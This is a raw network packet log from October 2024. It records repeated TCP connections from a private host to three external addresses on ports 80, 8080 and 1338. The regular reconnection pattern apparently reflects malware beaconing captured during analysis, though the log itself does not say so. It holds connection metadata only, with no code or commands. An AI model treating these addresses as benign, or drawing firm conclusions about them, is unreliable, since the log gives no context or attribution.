                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.469178915 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.473927021 CEST808049824190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.482584953 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.701769114 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.702073097 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.706891060 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707077026 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707102060 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707158089 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707685947 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.712521076 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799633980 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799752951 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799839020 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799892902 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800071001 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800072908 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800118923 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.822963953 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.827851057 CEST808049851190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.828496933 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.828929901 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.833760023 CEST808049851190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.743123055 CEST133849812189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.743206978 CEST498121338192.168.2.7189.25.42.209
Timestamp                            | Source Port | Dest Port | Source IP       | Dest IP
Oct 18, 2024 09:38:40.743695974 CEST | 49812       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:40.744544029 CEST | 49864       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:40.748552084 CEST | 1338        | 49812     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:40.749413967 CEST | 1338        | 49864     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:40.749490976 CEST | 49864       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:42.849776983 CEST | 49851       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:43.147034883 CEST | 49845       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:43.147533894 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:43.152278900 CEST | 80          | 49845     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:43.152357101 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:43.152415991 CEST | 49845       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:43.152471066 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:43.152618885 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:43.157398939 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:44.218116999 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:44.218274117 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:44.218306065 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:44.218442917 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:44.368341923 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:44.368590117 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:44.368670940 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:44.384848118 CEST | 49888       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:44.390690088 CEST | 8080        | 49888     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:38:44.390764952 CEST | 49888       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:44.390918970 CEST | 49888       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:44.395919085 CEST | 8080        | 49888     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:38:48.414602041 CEST | 49888       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:48.683176041 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:48.683584929 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:48.688498974 CEST | 80          | 49913     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:48.688582897 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:48.688736916 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:48.688987017 CEST | 80          | 49881     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:48.693162918 CEST | 49881       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:48.693510056 CEST | 80          | 49913     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:49.249767065 CEST | 1338        | 49864     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:49.249922037 CEST | 49864       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:49.250390053 CEST | 49864       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:49.251213074 CEST | 49916       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:49.255263090 CEST | 1338        | 49864     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:49.256028891 CEST | 1338        | 49916     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:49.256105900 CEST | 49916       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:49.758708000 CEST | 80          | 49913     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:49.758846998 CEST | 80          | 49913     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:49.758862972 CEST | 80          | 49913     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:49.758905888 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:49.758946896 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:49.771033049 CEST | 49922       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:49.775880098 CEST | 8080        | 49922     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:38:49.775940895 CEST | 49922       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:49.776119947 CEST | 49922       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:49.780910015 CEST | 8080        | 49922     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:38:53.779103994 CEST | 49922       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:54.000533104 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:54.000885010 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:54.127252102 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:54.127321005 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:54.127474070 CEST | 80          | 49913     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:54.127641916 CEST | 49913       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:54.130867004 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:54.135654926 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:55.191478968 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:55.191539049 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:55.191603899 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:55.191613913 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:55.191648960 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:55.191674948 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:55.191909075 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:55.192190886 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:55.206003904 CEST | 62459       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:55.210963011 CEST | 8080        | 62459     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:38:55.211626053 CEST | 62459       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:55.212109089 CEST | 62459       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:55.216907978 CEST | 8080        | 62459     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:38:57.733740091 CEST | 1338        | 49916     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:57.733813047 CEST | 49916       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:57.734241009 CEST | 49916       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:57.735146046 CEST | 62476       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:57.739044905 CEST | 1338        | 49916     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:57.740024090 CEST | 1338        | 62476     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:38:57.740097046 CEST | 62476       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:38:59.200915098 CEST | 62459       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:38:59.420728922 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:59.421014071 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:59.426091909 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:59.426707983 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:59.426867008 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:59.426997900 CEST | 80          | 49943     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:38:59.427079916 CEST | 49943       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:38:59.431869984 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:00.499979973 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:00.500058889 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:00.500077009 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:00.500104904 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:00.500366926 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:00.500399113 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:00.502077103 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:00.533832073 CEST | 62493       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:39:00.538887024 CEST | 8080        | 62493     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:39:00.538984060 CEST | 62493       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:39:00.539690971 CEST | 62493       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:39:00.544554949 CEST | 8080        | 62493     | 190.120.227.91  | 192.168.2.7
Oct 18, 2024 09:39:04.530611038 CEST | 62493       | 8080      | 192.168.2.7     | 190.120.227.91
Oct 18, 2024 09:39:04.766025066 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:04.766376019 CEST | 62510       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:05.184745073 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:05.683252096 CEST | 80          | 62510     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:05.683271885 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:05.683327913 CEST | 62510       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:05.683607101 CEST | 62510       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:05.683954000 CEST | 80          | 62487     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:05.684015036 CEST | 62487       | 80        | 192.168.2.7     | 185.53.178.50
Oct 18, 2024 09:39:05.689784050 CEST | 80          | 62510     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:06.220720053 CEST | 1338        | 62476     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:39:06.220782995 CEST | 62476       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:39:06.221218109 CEST | 62476       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:39:06.222042084 CEST | 62511       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:39:06.225980043 CEST | 1338        | 62476     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:39:06.227345943 CEST | 1338        | 62511     | 189.25.42.209   | 192.168.2.7
Oct 18, 2024 09:39:06.227412939 CEST | 62511       | 1338      | 192.168.2.7     | 189.25.42.209
Oct 18, 2024 09:39:06.749342918 CEST | 80          | 62510     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:06.749372959 CEST | 80          | 62510     | 185.53.178.50   | 192.168.2.7
Oct 18, 2024 09:39:06.749383926 CEST | 80          | 62510     | 185.53.178.50   | 192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749430895 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749475002 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749485970 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749531031 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.770070076 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.775274038 CEST808062512190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.775362968 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.780811071 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.785761118 CEST808062512190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:10.778944969 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.035934925 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.036371946 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041665077 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041769028 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041979074 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041985035 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.042037964 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.046941042 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134852886 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134888887 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134905100 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134927988 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134962082 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.135001898 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.135072947 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.162030935 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.166982889 CEST808062514190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.167114019 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.170757055 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.175584078 CEST808062514190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.710068941 CEST133862511189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.710248947 CEST625111338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.710664034 CEST625111338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.711659908 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.715492964 CEST133862511189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.716573000 CEST133862515189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.716808081 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.194612980 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.437671900 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.438035965 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443011999 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443106890 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443191051 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443202019 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443428040 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.448219061 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525407076 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525459051 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525495052 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525520086 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525520086 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525557995 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.562113047 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567184925 CEST808062517190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567745924 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567866087 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.572649002 CEST808062517190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.577260017 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.816313028 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.816895008 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.821922064 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.821980000 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822057962 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822066069 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822299004 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.827138901 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899507046 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899549007 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899584055 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899604082 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899657011 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899657011 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899880886 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899929047 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.914141893 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919094086 CEST808062519190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919245005 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919814110 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.924664021 CEST808062519190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.210630894 CEST133862515189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.210767031 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.211251020 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.212291956 CEST625201338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.216144085 CEST133862515189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.217397928 CEST133862520189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.217480898 CEST625201338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:26.962882996 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.219115973 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.219144106 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.224967957 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.225110054 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.225579977 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.225660086 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.229074955 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.234107018 CEST8062521185.53.178.50192.168.2.7
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 18, 2024 09:39:28.305110931 CEST  80           62521      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:28.305144072 CEST  80           62521      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:28.305160999 CEST  80           62521      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:28.305191994 CEST  62521        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:28.305238962 CEST  62521        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:28.330524921 CEST  62522        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:28.335300922 CEST  8080         62522      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:28.335371017 CEST  62522        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:28.339416981 CEST  62522        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:28.344232082 CEST  8080         62522      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:31.700592995 CEST  1338         62520      189.25.42.209    192.168.2.7
Oct 18, 2024 09:39:31.700697899 CEST  62520        1338       192.168.2.7      189.25.42.209
Oct 18, 2024 09:39:31.701323986 CEST  62520        1338       192.168.2.7      189.25.42.209
Oct 18, 2024 09:39:31.702238083 CEST  62523        1338       192.168.2.7      189.25.42.209
Oct 18, 2024 09:39:31.706166983 CEST  1338         62520      189.25.42.209    192.168.2.7
Oct 18, 2024 09:39:31.707134008 CEST  1338         62523      189.25.42.209    192.168.2.7
Oct 18, 2024 09:39:31.710190058 CEST  62523        1338       192.168.2.7      189.25.42.209
Oct 18, 2024 09:39:32.388529062 CEST  62522        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:32.651778936 CEST  62521        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:32.652982950 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:32.657217026 CEST  80           62521      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:32.657430887 CEST  62521        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:32.657896996 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:32.663108110 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:32.683916092 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:32.689095020 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:33.728588104 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:33.728702068 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:33.728744984 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:33.728761911 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:33.728775978 CEST  80           62524      185.53.178.50    192.168.2.7
Oct 18, 2024 09:39:33.728801966 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:33.728956938 CEST  62524        80         192.168.2.7      185.53.178.50
Oct 18, 2024 09:39:33.745547056 CEST  62525        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:33.750359058 CEST  8080         62525      190.120.227.91   192.168.2.7
Oct 18, 2024 09:39:33.750459909 CEST  62525        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:33.750663996 CEST  62525        8080       192.168.2.7      190.120.227.91
Oct 18, 2024 09:39:33.755469084 CEST  8080         62525      190.120.227.91   192.168.2.7
